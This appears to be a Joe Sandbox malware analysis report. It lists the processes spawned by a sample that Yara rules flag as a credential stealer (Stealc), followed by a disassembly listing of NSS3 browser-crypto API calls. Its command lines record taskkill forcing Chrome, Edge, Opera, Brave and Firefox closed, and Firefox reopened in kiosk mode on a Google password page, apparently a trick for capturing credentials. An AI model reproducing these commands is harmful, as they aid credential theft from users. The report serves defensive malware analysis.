Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:43:50
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"
Imagebase:	0x970000
File size:	1'858'048 bytes
MD5 hash:	52868AF74EE73E05662D437482D99489
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2911591776.0000000001480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2991550390.0000000001491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2875167398.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2875015160.0000000001481000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2940878588.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	18:43:51
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:43:51
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:43:51
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	18:43:52
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a180dc8-8c9c-4623-9a95-8d8228371a46} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 2739786e510 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:43:54
Start date:	09/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3380 -parentBuildID 20230927232528 -prefsHandle 4032 -prefMapHandle 1484 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d819197d-ad4a-4ad0-9b0f-25dcec234d88} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 27397886d10 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	18:43:56
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe"
Imagebase:	0x30000
File size:	2'841'600 bytes
MD5 hash:	AEC32FF205AECDA2D3D39769D699E065
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	18:43:59
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Imagebase:	0xb60000
File size:	1'806'848 bytes
MD5 hash:	C5CC3918AE519563751641959F52EA48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000025.00000002.2991880808.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000025.00000002.2997900690.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000025.00000003.2903532225.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	18:44:07
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"
Imagebase:	0x980000
File size:	971'264 bytes
MD5 hash:	72C4511A4B6D2BF79B718256C8D65AC8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:44:12
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	18:44:12
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	18:44:13
Start date:	09/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d985563cac.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	18:44:13
Start date:	09/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2060,i,10439888162211895715,7665317762376180404,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	18:44:20
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe"
Imagebase:	0x400000
File size:	1'947'136 bytes
MD5 hash:	3ACAA0D2F010B5962A1EE0687334660D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	18:44:26
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 572
Imagebase:	0xcd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	18:44:28
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	18:44:28
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	18:44:30
Start date:	09/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"
Imagebase:	0xb60000
File size:	1'806'848 bytes
MD5 hash:	C5CC3918AE519563751641959F52EA48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	18:44:30
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	18:44:30
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	18:44:32
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x590000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	18:44:32
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 6C5B6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C702120,6C5B7E60), ref: 6C5B6EBC
TlsGetValue.KERNEL32 ref: 6C5B6EDF
EnterCriticalSection.KERNEL32(?), ref: 6C5B6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C5B6F25

Part of subcall function 6C58A900: TlsGetValue.KERNEL32(00000000,?,6C7014E4,?,6C524DD9), ref: 6C58A90F
Part of subcall function 6C58A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C58A94F

PR_Unlock.NSS3 ref: 6C5B6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C5B6FA9
TlsGetValue.KERNEL32 ref: 6C5B70B4
EnterCriticalSection.KERNEL32(?), ref: 6C5B70C8
PR_CallOnce.NSS3(6C7024C0,6C5F7590), ref: 6C5B7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B7117
SECOID_Init.NSS3 ref: 6C5B7128
PORT_Alloc_Util.NSS3(00000057), ref: 6C5B714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B71A9
PR_NotifyAllCondVar.NSS3 ref: 6C5B71CF
PR_Unlock.NSS3 ref: 6C5B71DD
free.MOZGLUE(?), ref: 6C5B71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B7208
free.MOZGLUE(00000000), ref: 6C5B7221
free.MOZGLUE(00000001), ref: 6C5B7235
TlsGetValue.KERNEL32 ref: 6C5B724A
EnterCriticalSection.KERNEL32(?), ref: 6C5B725E
PR_NotifyCondVar.NSS3 ref: 6C5B7273
PR_Unlock.NSS3 ref: 6C5B7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C5B7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C6F0148,,defaultModDB,internalKeySlot), ref: 6C5B74CC
free.MOZGLUE(00000000), ref: 6C5B7513
free.MOZGLUE(00000000), ref: 6C5B751B
free.MOZGLUE(00000000), ref: 6C5B7528
free.MOZGLUE(00000000), ref: 6C5B753C
free.MOZGLUE(00000000), ref: 6C5B7550
free.MOZGLUE(00000000), ref: 6C5B7561
free.MOZGLUE(00000000), ref: 6C5B7572
free.MOZGLUE(00000000), ref: 6C5B7583
free.MOZGLUE(00000000), ref: 6C5B7594
free.MOZGLUE(00000000), ref: 6C5B75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C5B75BD
free.MOZGLUE(00000000), ref: 6C5B75C8
free.MOZGLUE(00000000), ref: 6C5B75F1
PR_NewLock.NSS3 ref: 6C5B7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C5B7686
PR_NewLock.NSS3 ref: 6C5B76A2

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C5B76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C5B7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C5B771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C5B7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C5B774A
DeleteCriticalSection.KERNEL32(?), ref: 6C5B7770
free.MOZGLUE(?), ref: 6C5B7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C5B77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5B77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C5B7821
PORT_Alloc_Util.NSS3(?), ref: 6C5B7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5B785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5B786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C5B78AC
free.MOZGLUE(00000000), ref: 6C5B78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C5B78F3
free.MOZGLUE(00000000), ref: 6C5B78FC
free.MOZGLUE(00000000), ref: 6C5B791C

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

kbi., xrefs: 6C5B7886
,defaultModDB,internalKeySlot, xrefs: 6C5B748D, 6C5B74AA
NSS Internal Module, xrefs: 6C5B74A2, 6C5B74C6
Spac, xrefs: 6C5B7389
dll, xrefs: 6C5B788E
extern:, xrefs: 6C5B772B
sql:, xrefs: 6C5B76FE
rdb:, xrefs: 6C5B7744
dbm:, xrefs: 6C5B7716
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C5B74C7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 87425393d6df32b88e0efa81c8344aeab50e34d860c56444b3b3d1f991a0c996
Instruction ID: 2034c2ebb4e4e704aae6566be3aead89b93073f8681d49faec92bd5d24509126
Opcode Fuzzy Hash: 87425393d6df32b88e0efa81c8344aeab50e34d860c56444b3b3d1f991a0c996
Instruction Fuzzy Hash: 4C5213B1E01301ABEF108F64DC55BAE7FB4AF06388F144429EC1AB6B41EB71D954CBA5

Function 6C5DBFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C5DC0C8

Part of subcall function 6C669440: LeaveCriticalSection.KERNEL32 ref: 6C6695CD
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669622
Part of subcall function 6C669440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C66964E

PR_EnterMonitor.NSS3 ref: 6C5DC0AE

Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C6691AA
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669212
Part of subcall function 6C669090: _PR_MD_WAIT_CV.NSS3 ref: 6C66926B

Part of subcall function 6C590600: GetLastError.KERNEL32(?,?,?,?,?,6C5905E2), ref: 6C590642
Part of subcall function 6C590600: TlsGetValue.KERNEL32(?,?,?,?,?,6C5905E2), ref: 6C59065D
Part of subcall function 6C590600: GetLastError.KERNEL32 ref: 6C590678
Part of subcall function 6C590600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C59068A
Part of subcall function 6C590600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C590693
Part of subcall function 6C590600: PR_SetErrorText.NSS3(00000000,?), ref: 6C59069D
Part of subcall function 6C590600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ACC204B4,?,?,?,?,?,6C5905E2), ref: 6C5906CA
Part of subcall function 6C590600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C5905E2), ref: 6C5906E6

PR_EnterMonitor.NSS3 ref: 6C5DC0F2
PR_ExitMonitor.NSS3 ref: 6C5DC10E
PR_ExitMonitor.NSS3 ref: 6C5DC081

Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C66945B
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669479
Part of subcall function 6C669440: EnterCriticalSection.KERNEL32 ref: 6C669495
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C6694E4
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669532
Part of subcall function 6C669440: LeaveCriticalSection.KERNEL32 ref: 6C66955D

PR_EnterMonitor.NSS3 ref: 6C5DC068

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C590600: GetProcAddress.KERNEL32(?,?), ref: 6C590623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C5DC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C5DC183
free.MOZGLUE(00000000), ref: 6C5DC18E
PR_LoadLibrary.NSS3(?), ref: 6C5DC1A3
PR_EnterMonitor.NSS3 ref: 6C5DC1D4
PR_ExitMonitor.NSS3 ref: 6C5DC1F3
PR_CallOnce.NSS3(6C702318,6C5DCA70), ref: 6C5DC210
PR_EnterMonitor.NSS3 ref: 6C5DC22B
PR_ExitMonitor.NSS3 ref: 6C5DC247
PR_EnterMonitor.NSS3 ref: 6C5DC26A
PR_ExitMonitor.NSS3 ref: 6C5DC287
PR_UnloadLibrary.NSS3(?), ref: 6C5DC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C5DC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5DC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C5DC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C5DC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C5DC7B5
PR_UnloadLibrary.NSS3(?), ref: 6C5DC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C5DC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DC8BF
PORT_Alloc_Util.NSS3(?), ref: 6C5DC8D5
free.MOZGLUE(00000000), ref: 6C5DC900
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DC9C7
